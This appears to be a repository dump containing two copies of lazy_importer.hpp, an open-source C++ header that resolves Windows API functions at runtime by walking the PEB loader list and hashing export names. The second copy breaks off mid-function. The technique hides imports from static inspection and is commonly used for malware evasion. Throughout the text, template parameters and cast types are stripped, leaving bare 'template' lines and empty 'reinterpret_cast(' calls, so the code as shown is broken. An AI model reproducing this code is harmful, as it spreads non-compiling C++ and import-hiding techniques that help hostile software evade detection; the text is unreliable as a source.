261 | return (*str ? khash(str + 1, hash_t::single(value, *str)) : value);
262 | }
263 |
264 | template
265 | LAZY_IMPORTER_FORCEINLINE hash_t::value_type hash(const CharT* str) noexcept
266 | {
267 | hash_t::value_type value = hash_t::offset;
268 |
269 | for(;;) {
270 | char c = *str++;
271 | if(!c)
272 | return value;
273 | value = hash_t::single(value, c);
274 | }
275 | }
276 |
277 | LAZY_IMPORTER_FORCEINLINE hash_t::value_type hash(
278 | const win::UNICODE_STRING_T& str) noexcept
279 | {
280 | auto first = str.Buffer;
281 | const auto last = first + (str.Length / sizeof(wchar_t));
282 | auto value = hash_t::offset;
283 | for(; first != last; ++first)
284 | value = hash_t::single(value, static_cast(*first));
285 |
286 | return value;
287 | }
288 |
289 | LAZY_IMPORTER_FORCEINLINE pair hash_forwarded(
290 | const char* str) noexcept
291 | {
292 | pair module_and_function{
293 | hash_t::offset, hash_t::offset
294 | };
295 |
296 | for(; *str != '.'; ++str)
297 | module_and_function.first = hash_t::single(module_and_function.first, *str);
298 |
299 | ++str;
300 |
301 | for(; *str; ++str)
302 | module_and_function.second = hash_t::single(module_and_function.second, *str);
303 |
304 | return module_and_function;
305 | }
306 |
307 |
308 | // some helper functions
309 | LAZY_IMPORTER_FORCEINLINE const win::PEB_T* peb() noexcept
310 | {
311 | #if defined(_M_X64) || defined(__amd64__)
312 | return reinterpret_cast(__readgsqword(0x60));
313 | #elif defined(_M_IX86) || defined(__i386__)
314 | return reinterpret_cast(__readfsdword(0x30));
315 | #elif defined(_M_ARM) || defined(__arm__)
316 | return *reinterpret_cast(_MoveFromCoprocessor(15, 0, 13, 0, 2) + 0x30);
317 | #elif defined(_M_ARM64) || defined(__aarch64__)
318 | return *reinterpret_cast(__getReg(18) + 0x60);
319 | #elif defined(_M_IA64) || defined(__ia64__)
320 | return *reinterpret_cast(static_cast(_rdteb()) + 0x60);
321 | #else
322 | #error Unsupported platform. Open an issue and I'll probably add support.
323 | #endif
324 | }
325 |
326 | LAZY_IMPORTER_FORCEINLINE const win::PEB_LDR_DATA_T* ldr()
327 | {
328 | return reinterpret_cast(peb()->Ldr);
329 | }
330 |
331 | LAZY_IMPORTER_FORCEINLINE const win::IMAGE_NT_HEADERS* nt_headers(
332 | const char* base) noexcept
333 | {
334 | return reinterpret_cast(
335 | base + reinterpret_cast(base)->e_lfanew);
336 | }
337 |
338 | LAZY_IMPORTER_FORCEINLINE const win::IMAGE_EXPORT_DIRECTORY* image_export_dir(
339 | const char* base) noexcept
340 | {
341 | return reinterpret_cast(
342 | base + nt_headers(base)->OptionalHeader.DataDirectory->VirtualAddress);
343 | }
344 |
345 | LAZY_IMPORTER_FORCEINLINE const win::LDR_DATA_TABLE_ENTRY_T* ldr_data_entry() noexcept
346 | {
347 | return reinterpret_cast(
348 | ldr()->InLoadOrderModuleList.Flink);
349 | }
350 |
351 | struct exports_directory {
352 | const char* _base;
353 | const win::IMAGE_EXPORT_DIRECTORY* _ied;
354 | unsigned long _ied_size;
355 |
356 | public:
357 | using size_type = unsigned long;
358 |
359 | LAZY_IMPORTER_FORCEINLINE
360 | exports_directory(const char* base) noexcept : _base(base)
361 | {
362 | const auto ied_data_dir = nt_headers(base)->OptionalHeader.DataDirectory[0];
363 | _ied = reinterpret_cast(
364 | base + ied_data_dir.VirtualAddress);
365 | _ied_size = ied_data_dir.Size;
366 | }
367 |
368 | LAZY_IMPORTER_FORCEINLINE explicit operator bool() const noexcept
369 | {
370 | return reinterpret_cast(_ied) != _base;
371 | }
372 |
373 | LAZY_IMPORTER_FORCEINLINE size_type size() const noexcept
374 | {
375 | return _ied->NumberOfNames;
376 | }
377 |
378 | LAZY_IMPORTER_FORCEINLINE const char* base() const noexcept { return _base; }
379 | LAZY_IMPORTER_FORCEINLINE const win::IMAGE_EXPORT_DIRECTORY* ied() const noexcept
380 | {
381 | return _ied;
382 | }
383 |
384 | LAZY_IMPORTER_FORCEINLINE const char* name(size_type index) const noexcept
385 | {
386 | return reinterpret_cast(
387 | _base + reinterpret_cast(
388 | _base + _ied->AddressOfNames)[index]);
389 | }
390 |
391 | LAZY_IMPORTER_FORCEINLINE const char* address(size_type index) const noexcept
392 | {
393 | const auto* const rva_table =
394 | reinterpret_cast(_base + _ied->AddressOfFunctions);
395 |
396 | const auto* const ord_table = reinterpret_cast(
397 | _base + _ied->AddressOfNameOrdinals);
398 |
399 | return _base + rva_table[ord_table[index]];
400 | }
401 |
402 | LAZY_IMPORTER_FORCEINLINE bool is_forwarded(
403 | const char* export_address) const noexcept
404 | {
405 | const auto ui_ied = reinterpret_cast(_ied);
406 | return (export_address > ui_ied && export_address < ui_ied + _ied_size);
407 | }
408 | };
409 |
410 | struct safe_module_enumerator {
411 | using value_type = const detail::win::LDR_DATA_TABLE_ENTRY_T;
412 | value_type* value;
413 | value_type* head;
414 |
415 | LAZY_IMPORTER_FORCEINLINE safe_module_enumerator() noexcept
416 | : safe_module_enumerator(ldr_data_entry())
417 | {}
418 |
419 | LAZY_IMPORTER_FORCEINLINE
420 | safe_module_enumerator(const detail::win::LDR_DATA_TABLE_ENTRY_T* ldr) noexcept
421 | : value(ldr->load_order_next()), head(value)
422 | {}
423 |
424 | LAZY_IMPORTER_FORCEINLINE void reset() noexcept
425 | {
426 | value = head->load_order_next();
427 | }
428 |
429 | LAZY_IMPORTER_FORCEINLINE bool next() noexcept
430 | {
431 | value = value->load_order_next();
432 |
433 | return value != head && value->DllBase;
434 | }
435 | };
436 |
437 | struct unsafe_module_enumerator {
438 | using value_type = const detail::win::LDR_DATA_TABLE_ENTRY_T*;
439 | value_type value;
440 |
441 | LAZY_IMPORTER_FORCEINLINE unsafe_module_enumerator() noexcept
442 | : value(ldr_data_entry())
443 | {}
444 |
445 | LAZY_IMPORTER_FORCEINLINE void reset() noexcept { value = ldr_data_entry(); }
446 |
447 | LAZY_IMPORTER_FORCEINLINE bool next() noexcept
448 | {
449 | value = value->load_order_next();
450 | return true;
451 | }
452 | };
453 |
454 | // provides the cached functions which use Derive classes methods
455 | template
456 | class lazy_base {
457 | protected:
458 | // This function is needed because every templated function
459 | // with different args has its own static buffer
460 | LAZY_IMPORTER_FORCEINLINE static void*& _cache() noexcept
461 | {
462 | static void* value = nullptr;
463 | return value;
464 | }
465 |
466 | public:
467 | template
468 | LAZY_IMPORTER_FORCEINLINE static T safe() noexcept
469 | {
470 | return Derived::template get();
471 | }
472 |
473 | template
474 | LAZY_IMPORTER_FORCEINLINE static T cached() noexcept
475 | {
476 | auto& cached = _cache();
477 | if(!cached)
478 | cached = Derived::template get();
479 |
480 | return (T)(cached);
481 | }
482 |
483 | template
484 | LAZY_IMPORTER_FORCEINLINE static T safe_cached() noexcept
485 | {
486 | return cached();
487 | }
488 | };
489 |
490 | template
491 | struct lazy_module : lazy_base> {
492 | template
493 | LAZY_IMPORTER_FORCEINLINE static T get() noexcept
494 | {
495 | Enum e;
496 | do {
497 | if(hash(e.value->BaseDllName) == Hash)
498 | return (T)(e.value->DllBase);
499 | } while(e.next());
500 | return {};
501 | }
502 |
503 | template
504 | LAZY_IMPORTER_FORCEINLINE static T in(Ldr ldr) noexcept
505 | {
506 | safe_module_enumerator e((const detail::win::LDR_DATA_TABLE_ENTRY_T*)(ldr));
507 | do {
508 | if(hash(e.value->BaseDllName) == Hash)
509 | return (T)(e.value->DllBase);
510 | } while(e.next());
511 | return {};
512 | }
513 |
514 | template
515 | LAZY_IMPORTER_FORCEINLINE static T in_cached(Ldr ldr) noexcept
516 | {
517 | auto& cached = lazy_base>::_cache();
518 | if(!cached)
519 | cached = in(ldr);
520 |
521 | return (T)(cached);
522 | }
523 | };
524 |
525 | template
526 | struct lazy_function : lazy_base, T> {
527 | using base_type = lazy_base, T>;
528 |
529 | template
530 | LAZY_IMPORTER_FORCEINLINE decltype(auto) operator()(Args&&... args) const
531 | {
532 | #ifndef LAZY_IMPORTER_CACHE_OPERATOR_PARENS
533 | return get()(std::forward(args)...);
534 | #else
535 | return this->cached()(std::forward(args)...);
536 | #endif
537 | }
538 |
539 | template
540 | LAZY_IMPORTER_FORCEINLINE static F get() noexcept
541 | {
542 | // for backwards compatability.
543 | // Before 2.0 it was only possible to resolve forwarded exports when
544 | // this macro was enabled
545 | #ifdef LAZY_IMPORTER_RESOLVE_FORWARDED_EXPORTS
546 | return forwarded();
547 | #else
548 |
549 | Enum e;
550 |
551 | do {
552 | #ifdef LAZY_IMPORTER_HARDENED_MODULE_CHECKS
553 | if(!e.value->DllBase || !e.value->FullDllName.Length)
554 | continue;
555 | #endif
556 |
557 | const exports_directory exports(e.value->DllBase);
558 |
559 | if(exports) {
560 | auto export_index = exports.size();
561 | while(export_index--)
562 | if(hash(exports.name(export_index)) == Hash)
563 | return (F)(exports.address(export_index));
564 | }
565 | } while(e.next());
566 | return {};
567 | #endif
568 | }
569 |
570 | template
571 | LAZY_IMPORTER_FORCEINLINE static F forwarded() noexcept
572 | {
573 | detail::win::UNICODE_STRING_T name;
574 | hash_t::value_type module_hash = 0;
575 | auto function_hash = Hash;
576 |
577 | Enum e;
578 | do {
579 | name = e.value->BaseDllName;
580 | name.Length -= 8; // get rid of .dll extension
581 |
582 | if(!module_hash || hash(name) == module_hash) {
583 | const exports_directory exports(e.value->DllBase);
584 |
585 | if(exports) {
586 | auto export_index = exports.size();
587 | while(export_index--)
588 | if(hash(exports.name(export_index)) == function_hash) {
589 | const auto addr = exports.address(export_index);
590 |
591 | if(exports.is_forwarded(addr)) {
592 | auto hashes = hash_forwarded(
593 | reinterpret_cast(addr));
594 |
595 | function_hash = hashes.second;
596 | module_hash = hashes.first;
597 |
598 | e.reset();
599 | break;
600 | }
601 | return (F)(addr);
602 | }
603 | }
604 | }
605 | } while(e.next());
606 | return {};
607 | }
608 |
609 | template
610 | LAZY_IMPORTER_FORCEINLINE static F forwarded_safe() noexcept
611 | {
612 | return forwarded();
613 | }
614 |
615 | template
616 | LAZY_IMPORTER_FORCEINLINE static F forwarded_cached() noexcept
617 | {
618 | auto& value = base_type::_cache();
619 | if(!value)
620 | value = forwarded();
621 | return (F)(value);
622 | }
623 |
624 | template
625 | LAZY_IMPORTER_FORCEINLINE static F forwarded_safe_cached() noexcept
626 | {
627 | return forwarded_cached();
628 | }
629 |
630 | template
631 | LAZY_IMPORTER_FORCEINLINE static F in(Module m) noexcept
632 | {
633 | if(IsSafe && !m)
634 | return {};
635 |
636 | const exports_directory exports((const char*)(m));
637 | if(IsSafe && !exports)
638 | return {};
639 |
640 | for(unsigned long i{};; ++i) {
641 | if(IsSafe && i == exports.size())
642 | break;
643 |
644 | if(hash(exports.name(i)) == Hash)
645 | return (F)(exports.address(i));
646 | }
647 | return {};
648 | }
649 |
650 | template
651 | LAZY_IMPORTER_FORCEINLINE static F in_safe(Module m) noexcept
652 | {
653 | return in(m);
654 | }
655 |
656 | template
657 | LAZY_IMPORTER_FORCEINLINE static F in_cached(Module m) noexcept
658 | {
659 | auto& value = base_type::_cache();
660 | if(!value)
661 | value = in(m);
662 | return (F)(value);
663 | }
664 |
665 | template
666 | LAZY_IMPORTER_FORCEINLINE static F in_safe_cached(Module m) noexcept
667 | {
668 | return in_cached(m);
669 | }
670 |
671 | template
672 | LAZY_IMPORTER_FORCEINLINE static F nt() noexcept
673 | {
674 | return in(ldr_data_entry()->load_order_next()->DllBase);
675 | }
676 |
677 | template
678 | LAZY_IMPORTER_FORCEINLINE static F nt_safe() noexcept
679 | {
680 | return in_safe(ldr_data_entry()->load_order_next()->DllBase);
681 | }
682 |
683 | template
684 | LAZY_IMPORTER_FORCEINLINE static F nt_cached() noexcept
685 | {
686 | return in_cached(ldr_data_entry()->load_order_next()->DllBase);
687 | }
688 |
689 | template
690 | LAZY_IMPORTER_FORCEINLINE static F nt_safe_cached() noexcept
691 | {
692 | return in_safe_cached(ldr_data_entry()->load_order_next()->DllBase);
693 | }
694 | };
695 |
696 | }} // namespace li::detail
697 |
698 | #endif // include guard
699 |
--------------------------------------------------------------------------------
/aes加密/lazy_importer.hpp:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2018-2020 Justas Masiulis
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 |
17 | // documentation is available at https://github.com/JustasMasiulis/lazy_importer
18 |
19 | #ifndef LAZY_IMPORTER_HPP
20 | #define LAZY_IMPORTER_HPP
21 |
22 | #define LI_FN(name) \
23 | ::li::detail::lazy_function<::li::detail::khash(#name), decltype(&name)>()
24 |
25 | #define LI_FN_DEF(name) ::li::detail::lazy_function<::li::detail::khash(#name), name>()
26 |
27 | #define LI_MODULE(name) ::li::detail::lazy_module<::li::detail::khash(name)>()
28 |
29 | // NOTE only std::forward is used from this header.
30 | // If there is a need to eliminate this dependency the function itself is very small.
31 |
32 | #include
33 | #include
34 | #include
35 |
36 | #ifndef LAZY_IMPORTER_NO_FORCEINLINE
37 | #if defined(_MSC_VER)
38 | #define LAZY_IMPORTER_FORCEINLINE __forceinline
39 | #elif defined(__GNUC__) && __GNUC__ > 3
40 | #define LAZY_IMPORTER_FORCEINLINE inline __attribute__((__always_inline__))
41 | #else
42 | #define LAZY_IMPORTER_FORCEINLINE inline
43 | #endif
44 | #else
45 | #define LAZY_IMPORTER_FORCEINLINE inline
46 | #endif
47 |
48 | #ifdef LAZY_IMPORTER_CASE_INSENSITIVE
49 | #define LAZY_IMPORTER_TOLOWER(c) (c >= 'A' && c <= 'Z' ? (c | (1 << 5)) : c)
50 | #else
51 | #define LAZY_IMPORTER_TOLOWER(c) (c)
52 | #endif
53 |
54 | namespace li {
55 | namespace detail {
56 |
57 | template
58 | struct pair {
59 | First first;
60 | Second second;
61 | };
62 |
63 | namespace win {
64 |
65 | struct LIST_ENTRY_T {
66 | const char* Flink;
67 | const char* Blink;
68 | };
69 |
70 | struct UNICODE_STRING_T {
71 | unsigned short Length;
72 | unsigned short MaximumLength;
73 | wchar_t* Buffer;
74 | };
75 |
76 | struct PEB_LDR_DATA_T {
77 | unsigned long Length;
78 | unsigned long Initialized;
79 | const char* SsHandle;
80 | LIST_ENTRY_T InLoadOrderModuleList;
81 | };
82 |
83 | struct PEB_T {
84 | unsigned char Reserved1[2];
85 | unsigned char BeingDebugged;
86 | unsigned char Reserved2[1];
87 | const char* Reserved3[2];
88 | PEB_LDR_DATA_T* Ldr;
89 | };
90 |
91 | struct LDR_DATA_TABLE_ENTRY_T {
92 | LIST_ENTRY_T InLoadOrderLinks;
93 | LIST_ENTRY_T InMemoryOrderLinks;
94 | LIST_ENTRY_T InInitializationOrderLinks;
95 | const char* DllBase;
96 | const char* EntryPoint;
97 | union {
98 | unsigned long SizeOfImage;
99 | const char* _dummy;
100 | };
101 | UNICODE_STRING_T FullDllName;
102 | UNICODE_STRING_T BaseDllName;
103 |
104 | LAZY_IMPORTER_FORCEINLINE const LDR_DATA_TABLE_ENTRY_T*
105 | load_order_next() const noexcept
106 | {
107 | return reinterpret_cast(
108 | InLoadOrderLinks.Flink);
109 | }
110 | };
111 |
112 | struct IMAGE_DOS_HEADER { // DOS .EXE header
113 | unsigned short e_magic; // Magic number
114 | unsigned short e_cblp; // Bytes on last page of file
115 | unsigned short e_cp; // Pages in file
116 | unsigned short e_crlc; // Relocations
117 | unsigned short e_cparhdr; // Size of header in paragraphs
118 | unsigned short e_minalloc; // Minimum extra paragraphs needed
119 | unsigned short e_maxalloc; // Maximum extra paragraphs needed
120 | unsigned short e_ss; // Initial (relative) SS value
121 | unsigned short e_sp; // Initial SP value
122 | unsigned short e_csum; // Checksum
123 | unsigned short e_ip; // Initial IP value
124 | unsigned short e_cs; // Initial (relative) CS value
125 | unsigned short e_lfarlc; // File address of relocation table
126 | unsigned short e_ovno; // Overlay number
127 | unsigned short e_res[4]; // Reserved words
128 | unsigned short e_oemid; // OEM identifier (for e_oeminfo)
129 | unsigned short e_oeminfo; // OEM information; e_oemid specific
130 | unsigned short e_res2[10]; // Reserved words
131 | long e_lfanew; // File address of new exe header
132 | };
133 |
134 | struct IMAGE_FILE_HEADER {
135 | unsigned short Machine;
136 | unsigned short NumberOfSections;
137 | unsigned long TimeDateStamp;
138 | unsigned long PointerToSymbolTable;
139 | unsigned long NumberOfSymbols;
140 | unsigned short SizeOfOptionalHeader;
141 | unsigned short Characteristics;
142 | };
143 |
144 | struct IMAGE_EXPORT_DIRECTORY {
145 | unsigned long Characteristics;
146 | unsigned long TimeDateStamp;
147 | unsigned short MajorVersion;
148 | unsigned short MinorVersion;
149 | unsigned long Name;
150 | unsigned long Base;
151 | unsigned long NumberOfFunctions;
152 | unsigned long NumberOfNames;
153 | unsigned long AddressOfFunctions; // RVA from base of image
154 | unsigned long AddressOfNames; // RVA from base of image
155 | unsigned long AddressOfNameOrdinals; // RVA from base of image
156 | };
157 |
158 | struct IMAGE_DATA_DIRECTORY {
159 | unsigned long VirtualAddress;
160 | unsigned long Size;
161 | };
162 |
163 | struct IMAGE_OPTIONAL_HEADER64 {
164 | unsigned short Magic;
165 | unsigned char MajorLinkerVersion;
166 | unsigned char MinorLinkerVersion;
167 | unsigned long SizeOfCode;
168 | unsigned long SizeOfInitializedData;
169 | unsigned long SizeOfUninitializedData;
170 | unsigned long AddressOfEntryPoint;
171 | unsigned long BaseOfCode;
172 | unsigned long long ImageBase;
173 | unsigned long SectionAlignment;
174 | unsigned long FileAlignment;
175 | unsigned short MajorOperatingSystemVersion;
176 | unsigned short MinorOperatingSystemVersion;
177 | unsigned short MajorImageVersion;
178 | unsigned short MinorImageVersion;
179 | unsigned short MajorSubsystemVersion;
180 | unsigned short MinorSubsystemVersion;
181 | unsigned long Win32VersionValue;
182 | unsigned long SizeOfImage;
183 | unsigned long SizeOfHeaders;
184 | unsigned long CheckSum;
185 | unsigned short Subsystem;
186 | unsigned short DllCharacteristics;
187 | unsigned long long SizeOfStackReserve;
188 | unsigned long long SizeOfStackCommit;
189 | unsigned long long SizeOfHeapReserve;
190 | unsigned long long SizeOfHeapCommit;
191 | unsigned long LoaderFlags;
192 | unsigned long NumberOfRvaAndSizes;
193 | IMAGE_DATA_DIRECTORY DataDirectory[16];
194 | };
195 |
196 | struct IMAGE_OPTIONAL_HEADER32 {
197 | unsigned short Magic;
198 | unsigned char MajorLinkerVersion;
199 | unsigned char MinorLinkerVersion;
200 | unsigned long SizeOfCode;
201 | unsigned long SizeOfInitializedData;
202 | unsigned long SizeOfUninitializedData;
203 | unsigned long AddressOfEntryPoint;
204 | unsigned long BaseOfCode;
205 | unsigned long BaseOfData;
206 | unsigned long ImageBase;
207 | unsigned long SectionAlignment;
208 | unsigned long FileAlignment;
209 | unsigned short MajorOperatingSystemVersion;
210 | unsigned short MinorOperatingSystemVersion;
211 | unsigned short MajorImageVersion;
212 | unsigned short MinorImageVersion;
213 | unsigned short MajorSubsystemVersion;
214 | unsigned short MinorSubsystemVersion;
215 | unsigned long Win32VersionValue;
216 | unsigned long SizeOfImage;
217 | unsigned long SizeOfHeaders;
218 | unsigned long CheckSum;
219 | unsigned short Subsystem;
220 | unsigned short DllCharacteristics;
221 | unsigned long SizeOfStackReserve;
222 | unsigned long SizeOfStackCommit;
223 | unsigned long SizeOfHeapReserve;
224 | unsigned long SizeOfHeapCommit;
225 | unsigned long LoaderFlags;
226 | unsigned long NumberOfRvaAndSizes;
227 | IMAGE_DATA_DIRECTORY DataDirectory[16];
228 | };
229 |
230 | struct IMAGE_NT_HEADERS {
231 | unsigned long Signature;
232 | IMAGE_FILE_HEADER FileHeader;
233 | #ifdef _WIN64
234 | IMAGE_OPTIONAL_HEADER64 OptionalHeader;
235 | #else
236 | IMAGE_OPTIONAL_HEADER32 OptionalHeader;
237 | #endif
238 | };
239 |
240 | } // namespace win
241 |
242 | // hashing stuff
243 | struct hash_t {
244 | using value_type = unsigned long;
245 | constexpr static value_type offset = 2166136261;
246 | constexpr static value_type prime = 16777619;
247 | constexpr static unsigned long long prime64 = prime;
248 |
249 | LAZY_IMPORTER_FORCEINLINE constexpr static value_type single(value_type value,
250 | char c) noexcept
251 | {
252 | return static_cast(
253 | (value ^ LAZY_IMPORTER_TOLOWER(c)) *
254 | static_cast(prime));
255 | }
256 | };
257 |
258 | template
259 | LAZY_IMPORTER_FORCEINLINE constexpr hash_t::value_type
260 | khash(const CharT* str, hash_t::value_type value = hash_t::offset) noexcept
261 | {
262 | return (*str ? khash(str + 1, hash_t::single(value, *str)) : value);
263 | }
264 |
265 | template
266 | LAZY_IMPORTER_FORCEINLINE hash_t::value_type hash(const CharT* str) noexcept
267 | {
268 | hash_t::value_type value = hash_t::offset;
269 |
270 | for (;;) {
271 | char c = *str++;
272 | if (!c)
273 | return value;
274 | value = hash_t::single(value, c);
275 | }
276 | }
277 |
278 | LAZY_IMPORTER_FORCEINLINE hash_t::value_type hash(
279 | const win::UNICODE_STRING_T& str) noexcept
280 | {
281 | auto first = str.Buffer;
282 | const auto last = first + (str.Length / sizeof(wchar_t));
283 | auto value = hash_t::offset;
284 | for (; first != last; ++first)
285 | value = hash_t::single(value, static_cast(*first));
286 |
287 | return value;
288 | }
289 |
290 | LAZY_IMPORTER_FORCEINLINE pair hash_forwarded(
291 | const char* str) noexcept
292 | {
293 | pair module_and_function{
294 | hash_t::offset, hash_t::offset
295 | };
296 |
297 | for (; *str != '.'; ++str)
298 | module_and_function.first = hash_t::single(module_and_function.first, *str);
299 |
300 | ++str;
301 |
302 | for (; *str; ++str)
303 | module_and_function.second = hash_t::single(module_and_function.second, *str);
304 |
305 | return module_and_function;
306 | }
307 |
308 |
309 | // some helper functions
310 | LAZY_IMPORTER_FORCEINLINE const win::PEB_T* peb() noexcept
311 | {
312 | #if defined(_M_X64) || defined(__amd64__)
313 | return reinterpret_cast(__readgsqword(0x60));
314 | #elif defined(_M_IX86) || defined(__i386__)
315 | return reinterpret_cast(__readfsdword(0x30));
316 | #elif defined(_M_ARM) || defined(__arm__)
317 | return *reinterpret_cast(_MoveFromCoprocessor(15, 0, 13, 0, 2) + 0x30);
318 | #elif defined(_M_ARM64) || defined(__aarch64__)
319 | return *reinterpret_cast(__getReg(18) + 0x60);
320 | #elif defined(_M_IA64) || defined(__ia64__)
321 | return *reinterpret_cast(static_cast(_rdteb()) + 0x60);
322 | #else
323 | #error Unsupported platform. Open an issue and I'll probably add support.
324 | #endif
325 | }
326 |
327 | LAZY_IMPORTER_FORCEINLINE const win::PEB_LDR_DATA_T* ldr()
328 | {
329 | return reinterpret_cast(peb()->Ldr);
330 | }
331 |
332 | LAZY_IMPORTER_FORCEINLINE const win::IMAGE_NT_HEADERS* nt_headers(
333 | const char* base) noexcept
334 | {
335 | return reinterpret_cast(
336 | base + reinterpret_cast(base)->e_lfanew);
337 | }
338 |
339 | LAZY_IMPORTER_FORCEINLINE const win::IMAGE_EXPORT_DIRECTORY* image_export_dir(
340 | const char* base) noexcept
341 | {
342 | return reinterpret_cast(
343 | base + nt_headers(base)->OptionalHeader.DataDirectory->VirtualAddress);
344 | }
345 |
346 | LAZY_IMPORTER_FORCEINLINE const win::LDR_DATA_TABLE_ENTRY_T* ldr_data_entry() noexcept
347 | {
348 | return reinterpret_cast(
349 | ldr()->InLoadOrderModuleList.Flink);
350 | }
351 |
352 | struct exports_directory {
353 | const char* _base;
354 | const win::IMAGE_EXPORT_DIRECTORY* _ied;
355 | unsigned long _ied_size;
356 |
357 | public:
358 | using size_type = unsigned long;
359 |
360 | LAZY_IMPORTER_FORCEINLINE
361 | exports_directory(const char* base) noexcept : _base(base)
362 | {
363 | const auto ied_data_dir = nt_headers(base)->OptionalHeader.DataDirectory[0];
364 | _ied = reinterpret_cast(
365 | base + ied_data_dir.VirtualAddress);
366 | _ied_size = ied_data_dir.Size;
367 | }
368 |
369 | LAZY_IMPORTER_FORCEINLINE explicit operator bool() const noexcept
370 | {
371 | return reinterpret_cast(_ied) != _base;
372 | }
373 |
374 | LAZY_IMPORTER_FORCEINLINE size_type size() const noexcept
375 | {
376 | return _ied->NumberOfNames;
377 | }
378 |
379 | LAZY_IMPORTER_FORCEINLINE const char* base() const noexcept { return _base; }
380 | LAZY_IMPORTER_FORCEINLINE const win::IMAGE_EXPORT_DIRECTORY* ied() const noexcept
381 | {
382 | return _ied;
383 | }
384 |
385 | LAZY_IMPORTER_FORCEINLINE const char* name(size_type index) const noexcept
386 | {
387 | return reinterpret_cast(
388 | _base + reinterpret_cast(
389 | _base + _ied->AddressOfNames)[index]);
390 | }
391 |
392 | LAZY_IMPORTER_FORCEINLINE const char* address(size_type index) const noexcept
393 | {
394 | const auto* const rva_table =
395 | reinterpret_cast(_base + _ied->AddressOfFunctions);
396 |
397 | const auto* const ord_table = reinterpret_cast(
398 | _base + _ied->AddressOfNameOrdinals);
399 |
400 | return _base + rva_table[ord_table[index]];
401 | }
402 |
403 | LAZY_IMPORTER_FORCEINLINE bool is_forwarded(
404 | const char* export_address) const noexcept
405 | {
406 | const auto ui_ied = reinterpret_cast(_ied);
407 | return (export_address > ui_ied && export_address < ui_ied + _ied_size);
408 | }
409 | };
410 |
411 | struct safe_module_enumerator {
412 | using value_type = const detail::win::LDR_DATA_TABLE_ENTRY_T;
413 | value_type* value;
414 | value_type* head;
415 |
416 | LAZY_IMPORTER_FORCEINLINE safe_module_enumerator() noexcept
417 | : safe_module_enumerator(ldr_data_entry())
418 | {}
419 |
420 | LAZY_IMPORTER_FORCEINLINE
421 | safe_module_enumerator(const detail::win::LDR_DATA_TABLE_ENTRY_T* ldr) noexcept
422 | : value(ldr->load_order_next()), head(value)
423 | {}
424 |
425 | LAZY_IMPORTER_FORCEINLINE void reset() noexcept
426 | {
427 | value = head->load_order_next();
428 | }
429 |
430 | LAZY_IMPORTER_FORCEINLINE bool next() noexcept
431 | {
432 | value = value->load_order_next();
433 |
434 | return value != head && value->DllBase;
435 | }
436 | };
437 |
438 | struct unsafe_module_enumerator {
439 | using value_type = const detail::win::LDR_DATA_TABLE_ENTRY_T*;
440 | value_type value;
441 |
442 | LAZY_IMPORTER_FORCEINLINE unsafe_module_enumerator() noexcept
443 | : value(ldr_data_entry())
444 | {}
445 |
446 | LAZY_IMPORTER_FORCEINLINE void reset() noexcept { value = ldr_data_entry(); }
447 |
448 | LAZY_IMPORTER_FORCEINLINE bool next() noexcept
449 | {
450 | value = value->load_order_next();
451 | return true;
452 | }
453 | };
454 |
455 | // provides the cached functions which use Derive classes methods
456 | template
457 | class lazy_base {
458 | protected:
459 | // This function is needed because every templated function
460 | // with different args has its own static buffer
461 | LAZY_IMPORTER_FORCEINLINE static void*& _cache() noexcept
462 | {
463 | static void* value = nullptr;
464 | return value;
465 | }
466 |
467 | public:
468 | template
469 | LAZY_IMPORTER_FORCEINLINE static T safe() noexcept
470 | {
471 | return Derived::template get();
472 | }
473 |
474 | template
475 | LAZY_IMPORTER_FORCEINLINE static T cached() noexcept
476 | {
477 | auto& cached = _cache();
478 | if (!cached)
479 | cached = Derived::template get();
480 |
481 | return (T)(cached);
482 | }
483 |
484 | template
485 | LAZY_IMPORTER_FORCEINLINE static T safe_cached() noexcept
486 | {
487 | return cached();
488 | }
489 | };
490 |
491 | template
492 | struct lazy_module : lazy_base> {
493 | template
494 | LAZY_IMPORTER_FORCEINLINE static T get() noexcept
495 | {
496 | Enum e;
497 | do {
498 | if (hash(e.value->BaseDllName) == Hash)
499 | return (T)(e.value->DllBase);
500 | } while (e.next());
501 | return {};
502 | }
503 |
504 | template
505 | LAZY_IMPORTER_FORCEINLINE static T in(Ldr ldr) noexcept
506 | {
507 | safe_module_enumerator e((const detail::win::LDR_DATA_TABLE_ENTRY_T*)(ldr));
508 | do {
509 | if (hash(e.value->BaseDllName) == Hash)
510 | return (T)(e.value->DllBase);
511 | } while (e.next());
512 | return {};
513 | }
514 |
515 | template
516 | LAZY_IMPORTER_FORCEINLINE static T in_cached(Ldr ldr) noexcept
517 | {
518 | auto& cached = lazy_base>::_cache();
519 | if (!cached)
520 | cached = in(ldr);
521 |
522 | return (T)(cached);
523 | }
524 | };
525 |
526 | template
527 | struct lazy_function : lazy_base, T> {
528 | using base_type = lazy_base, T>;
529 |
530 | template
531 | LAZY_IMPORTER_FORCEINLINE decltype(auto) operator()(Args&&... args) const
532 | {
533 | #ifndef LAZY_IMPORTER_CACHE_OPERATOR_PARENS
534 | return get()(std::forward(args)...);
535 | #else
536 | return this->cached()(std::forward(args)...);
537 | #endif
538 | }
539 |
540 | template
541 | LAZY_IMPORTER_FORCEINLINE static F get() noexcept
542 | {
543 | // for backwards compatability.
544 | // Before 2.0 it was only possible to resolve forwarded exports when
545 | // this macro was enabled
546 | #ifdef LAZY_IMPORTER_RESOLVE_FORWARDED_EXPORTS
547 | return forwarded();
548 | #else
549 |
550 | Enum e;
551 |
552 | do {
553 | #ifdef LAZY_IMPORTER_HARDENED_MODULE_CHECKS
554 | if (!e.value->DllBase || !e.value->FullDllName.Length)
555 | continue;
556 | #endif
557 |
558 | const exports_directory exports(e.value->DllBase);
559 |
560 | if (exports) {
561 | auto export_index = exports.size();
562 | while (export_index--)
563 | if (hash(exports.name(export_index)) == Hash)
564 | return (F)(exports.address(export_index));
565 | }
566 | } while (e.next());
567 | return {};
568 | #endif
569 | }
570 |
571 | template
572 | LAZY_IMPORTER_FORCEINLINE static F forwarded() noexcept
573 | {
574 | detail::win::UNICODE_STRING_T name;
575 | hash_t::value_type module_hash = 0;
